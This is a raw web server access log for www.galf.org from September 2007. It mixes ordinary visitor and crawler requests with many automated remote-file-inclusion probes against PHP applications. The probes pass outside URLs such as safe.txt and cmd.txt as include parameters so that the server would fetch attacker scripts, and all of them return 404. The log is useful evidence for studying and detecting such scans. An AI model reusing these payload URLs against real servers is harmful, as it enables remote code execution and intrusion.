64.201.76.117 - - [02/Sep/2007:23:40:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
69.108.165.134 - - [02/Sep/2007:23:40:52 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 1441792 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
69.108.165.134 - - [02/Sep/2007:23:40:52 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
64.201.76.117 - - [02/Sep/2007:23:41:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
69.108.165.134 - - [02/Sep/2007:23:41:24 -0700] "GET /logs/access_070723.log HTTP/1.1" 206 917504 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
69.108.165.134 - - [02/Sep/2007:23:41:27 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
69.108.165.134 - - [02/Sep/2007:23:41:31 -0700] "GET /logs/ HTTP/1.1" 200 5085 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
69.108.165.134 - - [02/Sep/2007:23:41:40 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
69.108.165.134 - - [02/Sep/2007:23:41:42 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
65.39.142.79 - - [02/Sep/2007:23:42:06 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.masferrer.edu.sv/none/galeria/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.39.142.79 - - [02/Sep/2007:23:42:06 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.masferrer.edu.sv/none/galeria/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
24.148.82.100 - - [02/Sep/2007:23:42:34 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 1310720 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
87.238.162.143 - - [02/Sep/2007:23:46:46 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.143 - - [02/Sep/2007:23:46:46 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:23:47:34 -0700] "GET /logs/access_070702.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.162.143 - - [02/Sep/2007:23:51:06 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.162.143 - - [02/Sep/2007:23:51:09 -0700] "GET /logs/access_070604.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:00:06:39 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:00:06:39 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.20.40.147 - - [03/Sep/2007:00:07:10 -0700] "GET /logs/index.php?action=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.20.40.147 - - [03/Sep/2007:00:07:18 -0700] "GET /index.php?action=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
74.6.23.24 - - [03/Sep/2007:00:09:22 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:00:20:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:00:20:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:00:20:01 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:00:20:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
81.21.73.27 - - [03/Sep/2007:00:24:31 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [03/Sep/2007:00:24:32 -0700] "GET /http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.24.152 - - [03/Sep/2007:00:26:27 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:00:33:06 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:00:33:06 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.15.147.51 - - [03/Sep/2007:00:39:54 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.15.147.51 - - [03/Sep/2007:00:39:54 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.194.6.227 - - [03/Sep/2007:00:39:59 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312467)" "www.galf.org"
74.6.19.171 - - [03/Sep/2007:00:40:41 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.244.132.110 - - [03/Sep/2007:00:42:42 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://cutlerscruisers.com/php/modules/PNphpBB2/includes/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.244.132.110 - - [03/Sep/2007:00:42:42 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://cutlerscruisers.com/php/modules/PNphpBB2/includes/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.21.73.27 - - [03/Sep/2007:00:46:10 -0700] "GET /logs/access.log/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.90.210.101 - - [03/Sep/2007:00:48:02 -0700] "GET /logs/system/_b/contentFiles/gBIndex.php?gBRootPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.90.210.101 - - [03/Sep/2007:00:48:02 -0700] "GET /system/_b/contentFiles/gBIndex.php?gBRootPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.7.201.127 - - [03/Sep/2007:00:52:22 -0700] "GET /logs/system/_b/contentFiles/gBIndex.php?gBRootPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.127 - - [03/Sep/2007:00:52:22 -0700] "GET /system/_b/contentFiles/gBIndex.php?gBRootPath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [03/Sep/2007:00:57:19 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [03/Sep/2007:00:57:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:00:58:54 -0700] "GET /logs/access_070716.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:00:58:54 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:00:58:54 -0700] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:00:58:56 -0700] "GET /logs/access.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.46.39.14 - - [03/Sep/2007:00:59:20 -0700] "GET /logs/access_070716.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:00:59:20 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:00:59:20 -0700] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:00:59:30 -0700] "GET /logs/access.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.46.39.14 - - [03/Sep/2007:01:00:27 -0700] "GET /logs/access_070716.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:01:00:27 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:01:00:27 -0700] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:01:01:28 -0700] "GET /logs/access_070716.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:01:01:28 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [03/Sep/2007:01:01:28 -0700] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.111.115.54 - - [03/Sep/2007:01:01:35 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.galf.org"
74.6.19.151 - - [03/Sep/2007:01:01:57 -0700] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.19.235 - - [03/Sep/2007:01:02:25 -0700] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.46.39.14 - - [03/Sep/2007:01:03:17 -0700] "GET /logs/access.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.golfmanagement.nl/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.244.132.110 - - [03/Sep/2007:01:03:57 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://cutlerscruisers.com/php/modules/PNphpBB2/includes/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.244.132.110 - - [03/Sep/2007:01:03:57 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://cutlerscruisers.com/php/modules/PNphpBB2/includes/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.249.73.202 - - [03/Sep/2007:01:06:12 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [03/Sep/2007:01:06:12 -0700] "GET /logs/scripts.log HTTP/1.1" 200 4016 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
62.10.248.18 - - [03/Sep/2007:01:06:55 -0700] "GET /logs/access_070716.log HTTP/1.1" 200 2587370 "http://www.google.it/search?q=by.ru+string.txt&hl=it&client=firefox-a&rls=com.ubuntu:en-US:official&start=10&sa=N" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.galf.org"
62.10.248.18 - - [03/Sep/2007:01:06:56 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.galf.org"
62.10.248.18 - - [03/Sep/2007:01:07:36 -0700] "GET /logs/access_070820.log HTTP/1.1" 200 589824 "http://www.google.it/search?q=by.ru+string.txt&hl=it&client=firefox-a&rls=com.ubuntu:en-US:official&start=20&sa=N" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.galf.org"
222.124.71.145 - - [03/Sep/2007:01:10:15 -0700] "GET /logs/access_070528.log HTTP/1.1" 200 253171 "http://www.google.co.id/search?q=%22index+of+/%22+r57.php&hl=id&start=40&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.galf.org"
207.23.252.129 - - [03/Sep/2007:01:12:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "http://www.galf.org/" "woriobot (+http://www.worio.com)" "www.galf.org"
207.23.252.129 - - [03/Sep/2007:01:12:09 -0700] "GET / HTTP/1.0" 200 1032 "http://espanol.iwhc.org/enlaces.cfm" "woriobot (+http://www.worio.com)" "www.galf.org"
212.241.213.244 - - [03/Sep/2007:01:13:30 -0700] "GET /logs//2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.244 - - [03/Sep/2007:01:13:30 -0700] "GET //2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.26.209 - - [03/Sep/2007:01:14:01 -0700] "GET /logs/access_070305.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.227.60.6 - - [03/Sep/2007:01:16:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.thebarnraisers.com/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.227.60.6 - - [03/Sep/2007:01:16:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.thebarnraisers.com/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.39.114 - - [03/Sep/2007:01:17:44 -0700] "GET /logs//2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.39.114 - - [03/Sep/2007:01:17:45 -0700] "GET //2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:01:30:34 -0700] "GET /logs//2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:01:30:34 -0700] "GET /logs//2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:01:30:34 -0700] "GET //2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:01:30:34 -0700] "GET //2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:01:30:36 -0700] "GET /logs//2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.213.107 - - [03/Sep/2007:01:30:36 -0700] "GET //2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.207.108.36 - - [03/Sep/2007:01:33:28 -0700] "GET /logs//2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.207.108.36 - - [03/Sep/2007:01:33:28 -0700] "GET //2007/wev/index.php?page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.114.141.176 - - [03/Sep/2007:01:40:24 -0700] "GET /includes/config-global.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.146.86.2 - - [03/Sep/2007:01:44:04 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.90.210.101 - - [03/Sep/2007:01:46:41 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.90.210.101 - - [03/Sep/2007:01:46:41 -0700] "GET //ws/login.php?noSet=0&includedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.162.134.131 - - [03/Sep/2007:01:48:28 -0700] "GET /logs/includes/config-global.php?_SESSION[docroot_path]=http://www.geocities.com/endang_mardiati/cek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.162.134.131 - - [03/Sep/2007:01:48:29 -0700] "GET /includes/config-global.php?_SESSION[docroot_path]=http://www.geocities.com/endang_mardiati/cek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:01:48:34 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [03/Sep/2007:01:48:34 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.7.201.127 - - [03/Sep/2007:01:51:09 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.127 - - [03/Sep/2007:01:51:09 -0700] "GET //ws/login.php?noSet=0&includedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.73.27 - - [03/Sep/2007:01:51:52 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [03/Sep/2007:01:51:52 -0700] "GET /http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [03/Sep/2007:01:53:07 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [03/Sep/2007:01:53:07 -0700] "GET /http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.26.100 - - [03/Sep/2007:01:54:08 -0700] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.146.86.2 - - [03/Sep/2007:01:57:15 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [03/Sep/2007:01:57:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.114.141.176 - - [03/Sep/2007:01:58:36 -0700] "GET /logs/access_070716.log/includes/config-global.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.176 - - [03/Sep/2007:01:58:36 -0700] "GET /logs/includes/config-global.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:01:59:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:01:59:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:01:59:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:01:59:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:01:59:31 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.170.97.200 - - [03/Sep/2007:01:59:31 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:01:59:31 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [03/Sep/2007:01:59:32 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.176 - - [03/Sep/2007:02:01:26 -0700] "GET /logs/access.log/includes/config-global.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.146.86.2 - - [03/Sep/2007:02:01:41 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:03:26 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.75.38 - - [03/Sep/2007:02:03:26 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
